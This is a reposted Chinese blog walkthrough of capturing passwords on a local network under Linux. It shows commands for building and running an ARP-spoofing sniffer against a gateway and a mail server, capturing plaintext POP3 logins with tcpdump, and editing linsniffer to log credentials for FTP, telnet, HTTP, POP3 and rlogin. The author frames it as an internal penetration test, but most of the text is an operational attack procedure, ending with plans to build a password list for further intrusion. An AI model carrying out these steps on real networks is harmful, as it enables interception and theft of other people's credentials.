linux 嗅探密码,Linux下嗅探又一实例截取
在SecureCRT下利用rz命令上傳我們用到的arpsniffer.c,然后編譯:
[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
報錯,可能是沒裝libnet的緣故,看說明Make: first you must install "pcap" and "libnet" 確定arpsniffer.c需要先裝pcap和 libnet。
[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install
準備工作已經(jīng)ok。下面重新編譯arpsniffer.c
[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
這次沒報錯,編譯成功。
[root@bbs111 root]# ./arpsniffer
====================================
============Arp Sniffer=============
==========Write by Paris-Ye=========
===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
===For example:
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
下面開始欺騙,由于是服務器端,因此我們欺騙網(wǎng)關:(網(wǎng)絡環(huán)境如下,郵件服務器ip:192.168.0.11 網(wǎng)關:192.168.0.1 本機:192.168.0.77)
[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59
Now Start... .. .
在另一個登錄里面用tcpdump監(jiān)聽下:
[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11
發(fā)現(xiàn)有數(shù)據(jù),把監(jiān)聽的數(shù)據(jù)存在文件里面:
[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt
10分鐘后停止,在SecureCRT下用sz命令下載pop.txt到本地,然后用Ethereal分析。果然發(fā)現(xiàn)明文用戶名和密碼。
下面我們就可以用linsniffer監(jiān)聽我們想要的用戶名和密碼了。
先修改linsniffer.c:根據(jù)自己的需求監(jiān)聽相應的應用密碼。我的如下:
if(ntohs(tcp->dest)==21)? p=1; /* ftp */
if(ntohs(tcp->dest)==22)? p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23)? p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1;? /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!
不用管警告,直接運行編譯后的linsniffer即可。
[root@bbs111 root]# ./linsniffer
用戶名和密碼都自動存到了tcp.log下。如圖8:
經(jīng)過測試后,我們把某人的用戶名和密碼發(fā)給某人,相信他再不會想當然的說sniffer不可能了。下面我們利用我們嗅探到的密碼做個密碼表,進行新一輪進一步的內(nèi)網(wǎng)***測試。相信在我們根據(jù)***測試結(jié)果,進行相關安全技術改造和安全管理規(guī)范制度改造后,我們的網(wǎng)絡的安全性會大大提升。
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯,堅持創(chuàng)作打卡瓜分現(xiàn)金大獎總結(jié)
以上是生活随笔為你收集整理的linux 嗅探密码,Linux下嗅探又一实例截取的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux统计字符串频数,Linux 统
- 下一篇: 在linux下赋予000权限,【linu